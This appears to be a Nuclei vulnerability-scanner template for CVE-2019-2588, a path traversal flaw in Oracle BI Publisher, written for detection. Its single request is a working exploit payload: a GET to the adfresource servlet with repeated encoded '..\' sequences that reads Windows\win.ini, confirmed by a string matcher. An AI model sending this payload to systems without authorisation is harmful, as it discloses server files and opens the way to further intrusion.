id: CVE-2019-2588 info: name: Oracle Business Intelligence Path Traversal author: madrobot severity: medium tags: cve,cve2019,oracle,lfi reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html description: | Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.90 cve-id: CVE-2019-2588 requests: - method: GET path: - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' - type: status status: - 200